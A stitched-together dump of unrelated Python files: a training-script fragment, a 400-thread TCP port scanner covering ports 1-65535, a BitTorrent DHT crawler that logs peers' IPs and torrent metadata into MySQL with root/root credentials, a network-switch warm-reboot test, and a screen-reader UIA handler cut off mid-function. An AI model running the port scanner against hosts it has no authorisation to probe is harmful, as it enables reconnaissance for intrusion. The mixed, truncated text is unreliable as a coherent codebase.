cfg_file = os.path.join("./configs", args.cfg_file + ".json")
with open(cfg_file, "r") as f:
config = json.load(f)
config["system"]["snapshot_name"] = args.cfg_file
system_config = SystemConfig().update_config(config["system"])
model_file = "core.models.{}".format(args.cfg_file)
model_file = importlib.import_module(model_file)
model = model_file.model()
train_split = system_config.train_split
val_split = system_config.val_split
print("Process {}: loading all datasets...".format(rank))
dataset = system_config.dataset
workers = args.workers
print("Process {}: using {} workers".format(rank, workers))
training_dbs = [datasets[dataset](config["db"], split=train_split, sys_config=system_config) for _ in range(workers)]
validation_db = datasets[dataset](config["db"], split=val_split, sys_config=system_config)
if rank == 0:
print("system config...")
pprint.pprint(system_config.full)
print("db config...")
pprint.pprint(training_dbs[0].configs)
print("len of db: {}".format(len(training_dbs[0].db_inds)))
print("distributed: {}".format(args.distributed))
train(training_dbs, validation_db, system_config, model, args)
if __name__ == "__main__":
args = parse_args()
previous = 100000000000000
distributed = args.distributed
world_size = args.world_size
if distributed and world_size < 0:
raise ValueError("world size must be greater than 0 in distributed training")
ngpus_per_node = torch.cuda.device_count()
if distributed:
args.world_size = ngpus_per_node * args.world_size
mp.spawn(main, nprocs=ngpus_per_node, args=(ngpus_per_node, args))
else:
main(None, ngpus_per_node, args)
|
portscan.py | import socket
from colorama import Fore as fore
from threading import Thread, Lock
from queue import Queue
import os
def init():
print("portscanner_module [OK]")
def execute(host):
N_THREADS = 400
global q
q = Queue()
print_lock = Lock()
global open_ports
open_ports = []
def portscan(port):
try:
s = socket.socket()
s.connect((host,port))
except:
with print_lock:
print(f"{fore.LIGHTBLACK_EX}{host:15} : {port:5} {fore.RESET}",end='\r')
else:
with print_lock:
print(f"{fore.GREEN}{host:15} : {port:5} is open {fore.RESET}")
open_ports.append(port)
finally:
s.close()
def scan_thread():
global q
while True:
worker = q.get()
portscan(worker)
q.task_done()
def main(host,ports):
global q
for t in range(N_THREADS):
t = Thread(target=scan_thread)
t.daemon = True
t.start()
for worker in ports:
q.put(worker)
q.join
print(f"{fore.RED}[+]Target: {host}")
#print("Enter the range for scan Default: 1-1024")
#port_range = 1-65535
#try:
# start,end = port_range.split("-")
# start,end = int(start),int(end)
# global ports
# ports = [p for p in range(start,end)]
#except:
start = "1"
end = "65535"
ports = [p for p in range(int(start),int(end))]
main(host,ports)
print("--------------------------------")
print("--------------------------------")
#os.system("clear")
print("[Wait......]")
return open_ports
|
startCrawler.py | #!/usr/bin/env python
# encoding: utf-8
"""
author:haoning
create time:2015.8.1
"""
import hashlib
import os
import time
import datetime
import traceback
import sys
import random
import json
import socket
import threading
from hashlib import sha1 # 进行hash加密
from random import randint
from struct import unpack
from socket import inet_ntoa
from threading import Timer, Thread
from time import sleep
from collections import deque
from Queue import Queue
import MySQLdb as mdb # 数据库连接器
import metautils
import downloadTorrent
from bencode import bencode, bdecode
import pygeoip
DB_HOST = '127.0.0.1'
DB_USER = 'root'
DB_PASS = 'root'
BOOTSTRAP_NODES = (
("67.215.246.10", 6881),
("82.221.103.244", 6881),
("23.21.224.150", 6881)
)
RATE = 1 # 调控速率
TID_LENGTH = 2
RE_JOIN_DHT_INTERVAL = 3
TOKEN_LENGTH = 2
INFO_HASH_LEN = 500000 # 50w数据很小,限制内存不至于消耗太大
CACHE_LEN = 100 # 更新数据库缓存
WAIT_DOWNLOAD = 80
geoip = pygeoip.GeoIP('GeoIP.dat')
def is_ip_allowed(ip):
country = geoip.country_code_by_addr(ip)
if country in ('CN', 'TW', 'JP', 'HK', 'KR'):
return True
return False
def entropy(length):
return "".join(chr(randint(0, 255)) for _ in xrange(length))
def random_id():
h = sha1()
h.update(entropy(20))
return h.digest()
def decode_nodes(nodes):
n = []
length = len(nodes)
if (length % 26) != 0:
return n
for i in range(0, length, 26):
nid = nodes[i:i + 20]
ip = inet_ntoa(nodes[i + 20:i + 24])
port = unpack("!H", nodes[i + 24:i + 26])[0]
n.append((nid, ip, port))
return n
def timer(t, f):
Timer(t, f).start()
def get_neighbor(target, nid, end=10):
return target[:end] + nid[end:]
class KNode(object):
def __init__(self, nid, ip, port):
self.nid = nid
self.ip = ip
self.port = port
class DHTClient(Thread):
def __init__(self, max_node_qsize):
Thread.__init__(self)
self.setDaemon(True)
self.max_node_qsize = max_node_qsize
self.nid = random_id()
self.nodes = deque(maxlen=max_node_qsize)
def send_krpc(self, msg, address):
try:
self.ufd.sendto(bencode(msg), address)
except Exception:
pass
def send_find_node(self, address, nid=None):
nid = get_neighbor(nid, self.nid) if nid else self.nid
tid = entropy(TID_LENGTH)
msg = {
"t": tid,
"y": "q",
"q": "find_node",
"a": {
"id": nid,
"target": random_id()
}
}
self.send_krpc(msg, address)
def join_DHT(self):
for address in BOOTSTRAP_NODES:
self.send_find_node(address)
def re_join_DHT(self):
if len(self.nodes) == 0:
self.join_DHT()
timer(RE_JOIN_DHT_INTERVAL, self.re_join_DHT)
def auto_send_find_node(self):
wait = 1.0 / self.max_node_qsize
while True:
try:
node = self.nodes.popleft()
self.send_find_node((node.ip, node.port), node.nid)
except IndexError:
pass
try:
sleep(wait)
except KeyboardInterrupt:
os._exit(0)
def process_find_node_response(self, msg, address):
nodes = decode_nodes(msg["r"]["nodes"])
for node in nodes:
(nid, ip, port) = node
if len(nid) != 20:
continue
if ip == self.bind_ip:
continue
n = KNode(nid, ip, port)
self.nodes.append(n)
class DHTServer(DHTClient): # 获得info_hash
def __init__(self, master, bind_ip, bind_port, max_node_qsize):
DHTClient.__init__(self, max_node_qsize)
self.master = master
self.bind_ip = bind_ip
self.bind_port = bind_port
self.speed = 0
self.process_request_actions = {
"get_peers": self.on_get_peers_request,
"announce_peer": self.on_announce_peer_request,
}
self.ufd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self.ufd.bind((self.bind_ip, self.bind_port))
timer(RE_JOIN_DHT_INTERVAL, self.re_join_DHT)
def run(self):
self.re_join_DHT()
while True:
try:
(data, address) = self.ufd.recvfrom(65536)
msg = bdecode(data)
self.on_message(msg, address)
except Exception:
pass
def on_message(self, msg, address):
global RATE # 设为全局量
try:
if msg["y"] == "r":
if "nodes" in msg["r"]:
self.process_find_node_response(msg, address) # 发现节点
elif msg["y"] == "q":
try:
self.speed += 1
if self.speed % 10000 == 0:
RATE = random.randint(1, 3)
if RATE == 2:
RATE = 1
if RATE == 3:
RATE = 10
if self.speed > 100000:
self.speed = 0
if self.speed % RATE == 0: # 数据过多,占用cpu太多,划分限速,1,1,10
self.process_request_actions[msg["q"]](msg, address) # 处理其他节点的请求,这个过程获取info_hash
#self.process_request_actions[msg["q"]](msg, address) #处理其他节点的请求,这个过程获取info_hash
except KeyError:
self.play_dead(msg, address)
except KeyError:
pass
def on_get_peers_request(self, msg, address):
try:
infohash = msg["a"]["info_hash"]
tid = msg["t"]
nid = msg["a"]["id"]
token = infohash[:TOKEN_LENGTH]
msg = {
"t": tid,
"y": "r",
"r": {
"id": get_neighbor(infohash, self.nid),
"nodes": "",
"token": token
}
}
self.master.log(infohash, address)
self.send_krpc(msg, address)
except KeyError:
pass
def on_announce_peer_request(self, msg, address):
try:
infohash = msg["a"]["info_hash"]
token = msg["a"]["token"]
nid = msg["a"]["id"]
tid = msg["t"]
if infohash[:TOKEN_LENGTH] == token:
if msg["a"].get("implied_port", 0) != 0:
port = address[1]
else:
port = msg["a"]["port"]
self.master.log_announce(infohash, (address[0], port))
except Exception:
pass
finally:
self.ok(msg, address)
def play_dead(self, msg, address):
try:
tid = msg["t"]
msg = {
"t": tid,
"y": "e",
"e": [202, "Server Error"]
}
self.send_krpc(msg, address)
except KeyError:
pass
def ok(self, msg, address):
try:
tid = msg["t"]
nid = msg["a"]["id"]
msg = {
"t": tid,
"y": "r",
"r": {
"id": get_neighbor(nid, self.nid)
}
}
self.send_krpc(msg, address)
except KeyError:
pass
class Master(Thread): # 解析info_hash
def __init__(self):
Thread.__init__(self)
self.setDaemon(True)
self.queue = Queue()
self.cache = Queue()
self.count = 0
self.mutex = threading.RLock() # 可重入锁,使单线程可以再次获得已经获得的?
self.waitDownload = Queue()
self.metadata_queue = Queue()
self.dbconn = mdb.connect(DB_HOST, DB_USER, DB_PASS, 'oksousou', charset='utf8')
self.dbconn.autocommit(False)
self.dbcurr = self.dbconn.cursor()
self.dbcurr.execute('SET NAMES utf8')
self.visited = set()
def lock(self): # 加锁
self.mutex.acquire()
def unlock(self): # 解锁
self.mutex.release()
def work(self, item):
while True:
self.prepare_download_metadata()
self.lock()
self.download_metadata()
self.unlock()
self.lock()
self.got_torrent()
self.unlock()
def start_work(self, max):
for item in xrange(max):
t = threading.Thread(target=self.work, args=(item,))
t.setDaemon(True)
t.start()
#入队的种子效率更高
def log_announce(self, binhash, address=None):
if self.queue.qsize() < INFO_HASH_LEN: # 大于INFO_HASH_LEN就不要入队,否则后面来不及处理
if is_ip_allowed(address[0]):
self.queue.put([address, binhash]) # 获得info_hash
def log(self, infohash, address=None):
if self.queue.qsize() < INFO_HASH_LEN: # 大于INFO_HASH_LEN/2就不要入队,否则后面来不及处理
if is_ip_allowed(address[0]):
self.queue.put([address, infohash])
def prepare_download_metadata(self):
if self.queue.qsize() == 0:
sleep(2)
#从queue中获得info_hash用来下载
address, binhash = self.queue.get()
if binhash in self.visited:
return
if len(self.visited) > 100000: # 大于100000重置队列,认为已经访问过了
self.visited = set()
self.visited.add(binhash)
#跟新已经访问过的info_hash
info_hash = binhash.encode('hex')
utcnow = datetime.datetime.utcnow()
self.cache.put((address, binhash, utcnow)) # 装入缓存队列
def download_metadata(self):
if self.cache.qsize() > CACHE_LEN / 2: # 出队更新下载
while self.cache.qsize() > 0: # 排空队列
address, binhash, utcnow = self.cache.get()
info_hash = binhash.encode('hex')
self.dbcurr.execute('SELECT id FROM search_hash WHERE info_hash=%s', (info_hash,))
y = self.dbcurr.fetchone()
if y:
# 更新最近发现时间,请求数
self.dbcurr.execute('UPDATE search_hash SET last_seen=%s, requests=requests+1 WHERE info_hash=%s', (utcnow, info_hash))
else:
self.waitDownload.put((address, binhash))
self.dbconn.commit()
if self.waitDownload.qsize() > WAIT_DOWNLOAD:
while self.waitDownload.qsize() > 0:
address, binhash = self.waitDownload.get()
t = threading.Thread(target=downloadTorrent.download_metadata, args=(address, binhash, self.metadata_queue))
t.setDaemon(True)
t.start()
def decode(self, s):
if type(s) is list:
s = ';'.join(s)
u = s
for x in (self.encoding, 'utf8', 'gbk', 'big5'):
try:
u = s.decode(x)
return u
except:
pass
return s.decode(self.encoding, 'ignore')
def decode_utf8(self, d, i):
if i+'.utf-8' in d:
return d[i+'.utf-8'].decode('utf8')
return self.decode(d[i])
def parse_metadata(self, data): #解析种子
info = {}
self.encoding = 'utf8'
try:
torrent = bdecode(data) #编码后解析
if not torrent.get('name'):
return None
except:
return None
detail = torrent
info['name'] = self.decode_utf8(detail, 'name')
if 'files' in detail:
info['files'] = []
for x in detail['files']:
if 'path.utf-8' in x:
v = {'path': self.decode('/'.join(x['path.utf-8'])), 'length': x['length']}
else:
v = {'path': self.decode('/'.join(x['path'])), 'length': x['length']}
if 'filehash' in x:
v['filehash'] = x['filehash'].encode('hex')
info['files'].append(v)
info['length'] = sum([x['length'] for x in info['files']])
else:
info['length'] = detail['length']
info['data_hash'] = hashlib.md5(detail['pieces']).hexdigest()
return info
def got_torrent(self):
if self.metadata_queue.qsize() == 0:
return
binhash, address, data,start_time = self.metadata_queue.get()
if not data:
return
try:
info = self.parse_metadata(data)
if not info:
return
except:
traceback.print_exc()
return
temp = time.time()
x = time.localtime(float(temp))
utcnow = time.strftime("%Y-%m-%d %H:%M:%S",x) # get time now
info_hash = binhash.encode('hex') #磁力
info['info_hash'] = info_hash
# need to build tags
info['tagged'] = False
info['classified'] = False
info['requests'] = 1
info['last_seen'] = utcnow
info['create_time'] = utcnow
info['source_ip'] = address[0]
if info.get('files'):
files = [z for z in info['files'] if not z['path'].startswith('_')]
if not files:
files = info['files']
else:
files = [{'path': info['name'], 'length': info['length']}]
files.sort(key=lambda z:z['length'], reverse=True)
bigfname = files[0]['path']
info['extension'] = metautils.get_extension(bigfname).lower()
info['category'] = metautils.get_category(info['extension'])
try:
try:
print '\n', 'Saved', info['info_hash'], info['name'], (time.time()-start_time), 's', address[0]
except:
print '\n', 'Saved', info['info_hash']
ret = self.dbcurr.execute('INSERT INTO search_hash(info_hash,category,data_hash,name,extension,classified,source_ip,tagged,' +
'length,create_time,last_seen,requests) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)',
(info['info_hash'], info['category'], info['data_hash'], info['name'], info['extension'], info['classified'],
info['source_ip'], info['tagged'], info['length'], info['create_time'], info['last_seen'], info['requests']))
if self.count % 50 == 0 :
self.dbconn.commit()
if self.count > 100000:
self.count = 0
except:
print self.name, 'save error', self.name, info
traceback.print_exc()
return
if __name__ == "__main__":
#启动客户端
master = Master()
master.start_work(150)
#启动服务器
dht = DHTServer(master, "0.0.0.0", 6881, max_node_qsize=200)
dht.start()
dht.auto_send_find_node()
|
wr_arp.py | # This is Control Plane Assistent test for Warm-Reboot.
# The test first start Ferret server, implemented in Python. Then initiate Warm-Rebbot procedure.
# While the host in Warm-Reboot test continiously sending ARP request to the Vlan member ports and
# expect to receive ARP replies. The test will fail as soon as there is no replies for more than 25 seconds
# for one of the Vlan member ports
# To Run the test from the command line:
# ptf --test-dir 1 1.ArpTest --platform-dir ptftests --platform remote -t "config_file='/tmp/vxlan_decap.json';ferret_ip='10.64.246.21';dut_ssh='10.3.147.243';how_long=370"
#
import time
import json
import subprocess
import datetime
import traceback
import sys
import socket
import threading
from collections import defaultdict
from pprint import pprint
from Queue import Queue
import ptf
from ptf.base_tests import BaseTest
from ptf import config
from ptf.mask import Mask
import ptf.dataplane as dataplane
import ptf.testutils as testutils
from device_connection import DeviceConnection
import ipaddress
class ArpTest(BaseTest):
def __init__(self):
BaseTest.__init__(self)
log_file_name = '/tmp/wr_arp_test.log'
self.log_fp = open(log_file_name, 'a')
self.log_fp.write("\nNew test:\n")
self.q_to_dut = Queue()
self.q_from_dut = Queue()
return
def __del__(self):
self.log_fp.close()
return
def log(self, message):
current_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print "%s : %s" % (current_time, message)
self.log_fp.write("%s : %s\n" % (current_time, message))
self.log_fp.flush()
return
def cmd(self, cmds):
process = subprocess.Popen(cmds,
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
return_code = process.returncode
return stdout, stderr, return_code
def dut_exec_cmd(self, cmd):
self.log("Executing cmd='{}'".format(cmd))
stdout, stderr, return_code = self.dut_connection.execCommand(cmd, timeout=30)
self.log("return_code={}, stdout={}, stderr={}".format(return_code, stdout, stderr))
if return_code == 0:
return True, str(stdout)
elif return_code == 255:
return True, str(stdout)
else:
return False, "return code: %d. stdout = '%s' stderr = '%s'" % (return_code, str(stdout), str(stderr))
def dut_thr(self, q_from, q_to):
while True:
cmd = q_from.get()
if cmd == 'WR':
self.log("Rebooting remote side")
res, res_text = self.dut_exec_cmd("sudo warm-reboot -c {}".format(self.ferret_ip))
if res:
q_to.put('ok: %s' % res_text)
else:
q_to.put('error: %s' % res_text)
elif cmd == 'uptime':
self.log("Check uptime remote side")
res, res_text = self.dut_exec_cmd("uptime -s")
if res:
q_to.put('ok: %s' % res_text)
else:
q_to.put('error: %s' % res_text)
elif cmd == 'quit':
q_to.put("done")
break
else:
self.log('Unsupported cmd: %s' % cmd)
q_to.put("error: unsupported cmd: %s" % cmd)
self.log("Quiting from dut_thr")
return
def test_port_thr(self):
self.log("test_port_thr started")
while True:
for test in self.tests:
self.log("Looping through tests: {}".format(test))
for port in test['acc_ports']:
if time.time() > self.stop_at:
break
nr_rcvd = self.testPort(port)
self.records[port][time.time()] = nr_rcvd
else:
continue
break
else:
continue
break
self.log("Quiting from test_port_thr")
return
def readMacs(self):
addrs = {}
for intf in os.listdir('/sys/class/net'):
if os.path.isdir('/sys/class/net/%s' % intf):
with open('/sys/class/net/%s/address' % intf) as fp:
addrs[intf] = fp.read().strip()
return addrs
def generate_VlanPrefixes(self, gw, prefixlen, acc_ports):
res = {}
n_hosts = 2**(32 - prefixlen) - 3
nr_of_dataplane_ports = len(self.dataplane.ports)
if nr_of_dataplane_ports > n_hosts:
raise Exception("The prefix len size is too small for the test")
gw_addr_n = struct.unpack(">I", socket.inet_aton(gw))[0]
mask = (2**32 - 1) ^ (2**(32 - prefixlen) - 1)
net_addr_n = gw_addr_n & mask
addr = 1
for port in acc_ports:
while True:
host_addr_n = net_addr_n + addr
host_ip = socket.inet_ntoa(struct.pack(">I", host_addr_n))
if host_ip != gw:
break
else:
addr += 1 # skip gw
res[port] = host_ip
addr += 1
return res
def generatePkts(self, gw, port_ip, port_mac, vlan_id):
pkt = testutils.simple_arp_packet(
ip_snd=port_ip,
ip_tgt=gw,
eth_src=port_mac,
hw_snd=port_mac,
vlan_vid=vlan_id
)
exp_pkt = testutils.simple_arp_packet(
ip_snd=gw,
ip_tgt=port_ip,
eth_src=self.dut_mac,
eth_dst=port_mac,
hw_snd=self.dut_mac,
hw_tgt=port_mac,
arp_op=2,
vlan_vid=vlan_id
)
masked_exp_pkt = Mask(exp_pkt)
# Ignore the Ethernet padding zeros
masked_exp_pkt.set_ignore_extra_bytes()
return pkt, masked_exp_pkt
def generatePackets(self):
self.gen_pkts = {}
for test in self.tests:
for port in test['acc_ports']:
gw = test['vlan_gw']
port_ip = test['vlan_ip_prefixes'][port]
port_mac = self.ptf_mac_addrs['eth%d' % port]
tagging_mode = test['tagging_mode'][port]
if tagging_mode == 'tagged':
vlan_id = test['vlan_id']
else:
vlan_id = 0
self.gen_pkts[port] = self.generatePkts(gw, port_ip, port_mac, vlan_id)
return
def get_param(self, param_name, required=True, default = None):
params = testutils.test_params_get()
if param_name not in params:
if required:
raise Exception("required parameter '%s' is not presented" % param_name)
else:
return default
else:
return params[param_name]
def setUp(self):
self.dataplane = ptf.dataplane_instance
config = self.get_param('config_file')
self.ferret_ip = self.get_param('ferret_ip')
self.dut_ssh = self.get_param('dut_ssh')
self.dut_username = self.get_param('dut_username')
self.dut_password = self.get_param('dut_password')
self.dut_alt_password=self.get_param('alt_password')
self.dut_connection = DeviceConnection(self.dut_ssh,
username=self.dut_username,
password=self.dut_password,
alt_password=self.dut_alt_password)
self.how_long = int(self.get_param('how_long', required=False, default=300))
if not os.path.isfile(config):
raise Exception("the config file %s doesn't exist" % config)
with open(config) as fp:
graph = json.load(fp)
self.tests = []
vni_base = 0
for vlan, config in graph['vlan_facts'].items():
test = {}
test['acc_ports'] = []
test['tagging_mode'] = {}
for member, mode in config['members'].items():
ptf_port_idx = graph['minigraph_port_indices'][member]
test['acc_ports'].append(ptf_port_idx)
test['tagging_mode'].update(
{
ptf_port_idx: mode['tagging_mode']
}
)
test['vlan_id'] = int(config['vlanid'])
test['vni'] = vni_base + test['vlan_id']
prefixlen = None
for d in config['interfaces']:
if sys.version_info < (3, 0):
ip = ipaddress.ip_address(d['addr'].decode('utf8'))
else:
ip = ipaddress.ip_address(d['addr'])
if ip.version == 4:
test['vlan_gw'] = d['addr']
prefixlen = int(d['prefixlen'])
test['vlan_ip_prefixes'] = self.generate_VlanPrefixes(d['addr'], prefixlen, test['acc_ports'])
break
else:
raise Exception("No invalid IPv4 address found for Vlan '%s'" % vlan)
self.tests.append(test)
self.dut_mac = graph['dut_mac']
self.ptf_mac_addrs = self.readMacs()
self.generatePackets()
self.cmd(["supervisorctl", "restart", "ferret"])
self.dataplane.flush()
return
def tearDown(self):
self.cmd(["supervisorctl", "stop", "ferret"])
return
def runTest(self):
print
thr = threading.Thread(target=self.dut_thr, kwargs={'q_from': self.q_to_dut, 'q_to': self.q_from_dut})
thr.setDaemon(True)
thr.start()
uptime_before = self.req_dut('uptime')
if uptime_before.startswith('error'):
self.log("DUT returned error for first uptime request")
self.req_dut('quit')
self.assertTrue(False, "DUT returned error for first uptime request")
self.records = defaultdict(dict)
self.stop_at = time.time() + self.how_long
test_port_thr = threading.Thread(target=self.test_port_thr)
test_port_thr.setDaemon(True)
test_port_thr.start()
self.log("Issuing WR command")
result = self.req_dut('WR')
if result.startswith('ok'):
self.log("WR OK!")
else:
self.log("Error in WR")
self.req_dut('quit')
self.assertTrue(False, "Error in WR")
self.assertTrue(time.time() < self.stop_at, "warm-reboot took to long")
test_port_thr.join(timeout=self.how_long)
if test_port_thr.isAlive():
self.log("Timed out waiting for traffic-sender (test_port_thr thread)")
self.req_dut('quit')
self.assertTrue(False, "Timed out waiting for traffic-sender (test_port_thr thread)")
uptime_after = self.req_dut('uptime')
if uptime_after.startswith('error'):
self.log("DUT returned error for second uptime request")
self.req_dut('quit')
self.assertTrue(False, "DUT returned error for second uptime request")
self.req_dut('quit')
if uptime_before == uptime_after:
self.log("The DUT wasn't rebooted. Uptime: %s vs %s" % (uptime_before, uptime_after))
self.assertTrue(uptime_before != uptime_after, "The DUT wasn't rebooted. Uptime: %s vs %s" % (uptime_before, uptime_after))
# check that every port didn't have pauses more than 25 seconds
pauses = defaultdict(list)
for port, data in self.records.items():
was_active = True
last_inactive = None
for t in sorted(data.keys()):
active = data[t] > 0
if was_active and not active:
last_inactive = t
elif not was_active and active:
pauses[port].append(t - last_inactive)
was_active = active
if not was_active:
pauses[port].append(sorted(data.keys())[-1] - last_inactive)
m_pauses = { port:max(pauses[port]) for port in pauses.keys() if max(pauses[port]) > 25 }
for port in m_pauses.keys():
self.log("Port eth%d. Max pause in arp_response %d sec" % (port, int(m_pauses[port])))
print
sys.stdout.flush()
self.assertTrue(len(m_pauses) == 0, "Too long pauses in arp responses")
return
def testPort(self, port):
pkt, exp_pkt = self.gen_pkts[port]
testutils.send_packet(self, port, pkt)
nr_rcvd = testutils.count_matched_packets(self, exp_pkt, port, timeout=0.2)
return nr_rcvd
def req_dut(self, cmd):
self.log("cmd: %s" % cmd)
self.q_to_dut.put(cmd)
reply = self.q_from_dut.get()
self.log("reply: %s" % reply)
return reply
|
_UIAHandler.py | #_UIAHandler.py
#A part of NonVisual Desktop Access (NVDA)
#Copyright (C) 2011-2018 NV Access Limited, Joseph Lee, Babbage B.V.
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
from ctypes import *
from ctypes.wintypes import *
import comtypes.client
from comtypes.automation import VT_EMPTY
from comtypes import *
import weakref
import threading
import time
import config
import api
import appModuleHandler
import queueHandler
import controlTypes
import NVDAHelper
import winKernel
import winUser
import eventHandler
from logHandler import log
import UIAUtils
from comtypes.gen.UIAutomationClient import *
#Some newer UIA constants that could be missing
ItemIndex_Property_GUID=GUID("{92A053DA-2969-4021-BF27-514CFC2E4A69}")
ItemCount_Property_GUID=GUID("{ABBF5C45-5CCC-47b7-BB4E-87CB87BBD162}")
HorizontalTextAlignment_Left=0
HorizontalTextAlignment_Centered=1
HorizontalTextAlignment_Right=2
HorizontalTextAlignment_Justified=3
# The name of the WDAG (Windows Defender Application Guard) process
WDAG_PROCESS_NAME=u'hvsirdpclient'
goodUIAWindowClassNames=[
# A WDAG (Windows Defender Application Guard) Window is always native UIA, even if it doesn't report as such.
'RAIL_WINDOW',
]
badUIAWindowClassNames=[
"SysTreeView32",
"WuDuiListView",
"ComboBox",
"msctls_progress32",
"Edit",
"CommonPlacesWrapperWndClass",
"SysMonthCal32",
"SUPERGRID", #Outlook 2010 message list
"RichEdit",
"RichEdit20",
"RICHEDIT50W",
"SysListView32",
"EXCEL7",
"Button",
# #7497: Windows 10 Fall Creators Update has an incomplete UIA implementation for console windows, therefore for now we should ignore it.
# It does not implement caret/selection, and probably has no new text events.
"ConsoleWindowClass",
]
# #8405: used to detect UIA dialogs prior to Windows 10 RS5.
UIADialogClassNames=[
"#32770",
"NUIDialog",
"Credential Dialog Xaml Host", # UAC dialog in Anniversary Update and later
"Shell_Dialog",
"Shell_Flyout",
"Shell_SystemDialog", # Various dialogs in Windows 10 Settings app
]
NVDAUnitsToUIAUnits={
"character":TextUnit_Character,
"word":TextUnit_Word,
"line":TextUnit_Line,
"paragraph":TextUnit_Paragraph,
"readingChunk":TextUnit_Line,
}
UIAControlTypesToNVDARoles={
UIA_ButtonControlTypeId:controlTypes.ROLE_BUTTON,
UIA_CalendarControlTypeId:controlTypes.ROLE_CALENDAR,
UIA_CheckBoxControlTypeId:controlTypes.ROLE_CHECKBOX,
UIA_ComboBoxControlTypeId:controlTypes.ROLE_COMBOBOX,
UIA_EditControlTypeId:controlTypes.ROLE_EDITABLETEXT,
UIA_HyperlinkControlTypeId:controlTypes.ROLE_LINK,
UIA_ImageControlTypeId:controlTypes.ROLE_GRAPHIC,
UIA_ListItemControlTypeId:controlTypes.ROLE_LISTITEM,
UIA_ListControlTypeId:controlTypes.ROLE_LIST,
UIA_MenuControlTypeId:controlTypes.ROLE_POPUPMENU,
UIA_MenuBarControlTypeId:controlTypes.ROLE_MENUBAR,
UIA_MenuItemControlTypeId:controlTypes.ROLE_MENUITEM,
UIA_ProgressBarControlTypeId:controlTypes.ROLE_PROGRESSBAR,
UIA_RadioButtonControlTypeId:controlTypes.ROLE_RADIOBUTTON,
UIA_ScrollBarControlTypeId:controlTypes.ROLE_SCROLLBAR,
UIA_SliderControlTypeId:controlTypes.ROLE_SLIDER,
UIA_SpinnerControlTypeId:controlTypes.ROLE_SPINBUTTON,
UIA_StatusBarControlTypeId:controlTypes.ROLE_STATUSBAR,
UIA_TabControlTypeId:controlTypes.ROLE_TABCONTROL,
UIA_TabItemControlTypeId:controlTypes.ROLE_TAB,
UIA_TextControlTypeId:controlTypes.ROLE_STATICTEXT,
UIA_ToolBarControlTypeId:controlTypes.ROLE_TOOLBAR,
UIA_ToolTipControlTypeId:controlTypes.ROLE_TOOLTIP,
UIA_TreeControlTypeId:controlTypes.ROLE_TREEVIEW,
UIA_TreeItemControlTypeId:controlTypes.ROLE_TREEVIEWITEM,
UIA_CustomControlTypeId:controlTypes.ROLE_UNKNOWN,
UIA_GroupControlTypeId:controlTypes.ROLE_GROUPING,
UIA_ThumbControlTypeId:controlTypes.ROLE_THUMB,
UIA_DataGridControlTypeId:controlTypes.ROLE_DATAGRID,
UIA_DataItemControlTypeId:controlTypes.ROLE_DATAITEM,
UIA_DocumentControlTypeId:controlTypes.ROLE_DOCUMENT,
UIA_SplitButtonControlTypeId:controlTypes.ROLE_SPLITBUTTON,
UIA_WindowControlTypeId:controlTypes.ROLE_WINDOW,
UIA_PaneControlTypeId:controlTypes.ROLE_PANE,
UIA_HeaderControlTypeId:controlTypes.ROLE_HEADER,
UIA_HeaderItemControlTypeId:controlTypes.ROLE_HEADERITEM,
UIA_TableControlTypeId:controlTypes.ROLE_TABLE,
UIA_TitleBarControlTypeId:controlTypes.ROLE_TITLEBAR,
UIA_SeparatorControlTypeId:controlTypes.ROLE_SEPARATOR,
}
UIAPropertyIdsToNVDAEventNames={
UIA_NamePropertyId:"nameChange",
UIA_HelpTextPropertyId:"descriptionChange",
UIA_ExpandCollapseExpandCollapseStatePropertyId:"stateChange",
UIA_ToggleToggleStatePropertyId:"stateChange",
UIA_IsEnabledPropertyId:"stateChange",
UIA_ValueValuePropertyId:"valueChange",
UIA_RangeValueValuePropertyId:"valueChange",
UIA_ControllerForPropertyId:"UIA_controllerFor",
}
UIAEventIdsToNVDAEventNames={
UIA_LiveRegionChangedEventId:"liveRegionChange",
#UIA_Text_TextChangedEventId:"textChanged",
UIA_SelectionItem_ElementSelectedEventId:"UIA_elementSelected",
UIA_MenuOpenedEventId:"gainFocus",
UIA_SelectionItem_ElementAddedToSelectionEventId:"stateChange",
UIA_SelectionItem_ElementRemovedFromSelectionEventId:"stateChange",
#UIA_MenuModeEndEventId:"menuModeEnd",
#UIA_Text_TextSelectionChangedEventId:"caret",
UIA_ToolTipOpenedEventId:"UIA_toolTipOpened",
#UIA_AsyncContentLoadedEventId:"documentLoadComplete",
#UIA_ToolTipClosedEventId:"hide",
UIA_Window_WindowOpenedEventId:"UIA_window_windowOpen",
UIA_SystemAlertEventId:"UIA_systemAlert",
}
class UIAHandler(COMObject):
_com_interfaces_=[IUIAutomationEventHandler,IUIAutomationFocusChangedEventHandler,IUIAutomationPropertyChangedEventHandler,IUIAutomationNotificationEventHandler]
def __init__(self):
super(UIAHandler,self).__init__()
self.MTAThreadInitEvent=threading.Event()
self.MTAThreadStopEvent=threading.Event()
self.MTAThreadInitException=None
self.MTAThread=threading.Thread(target=self.MTAThreadFunc)
self.MTAThread.daemon=True
self.MTAThread.start()
self.MTAThreadInitEvent.wait(2)
if self.MTAThreadInitException:
raise self.MTAThreadInitException
def terminate(self):
MTAThreadHandle=HANDLE(windll.kernel32.OpenThread(winKernel.SYNCHRONIZE,False,self.MTAThread.ident))
self.MTAThreadStopEvent.set()
#Wait for the MTA thread to die (while still message pumping)
if windll.user32.MsgWaitForMultipleObjects(1,byref(MTAThreadHandle),False,200,0)!=0:
log.debugWarning("Timeout or error while waiting for UIAHandler MTA thread")
windll.kernel32.CloseHandle(MTAThreadHandle)
del self.MTAThread
def MTAThreadFunc(self):
try:
oledll.ole32.CoInitializeEx(None,comtypes.COINIT_MULTITHREADED)
isUIA8=False
try:
self.clientObject=CoCreateInstance(CUIAutomation8._reg_clsid_,interface=IUIAutomation,clsctx=CLSCTX_INPROC_SERVER)
isUIA8=True
except (COMError,WindowsError,NameError):
self.clientObject=CoCreateInstance(CUIAutomation._reg_clsid_,interface=IUIAutomation,clsctx=CLSCTX_INPROC_SERVER)
if isUIA8:
# #8009: use appropriate interface based on highest supported interface.
# #8338: made easier by traversing interfaces supported on Windows 8 and later in reverse.
for interface in reversed(CUIAutomation8._com_interfaces_):
try:
self.clientObject=self.clientObject.QueryInterface(interface)
break
except COMError:
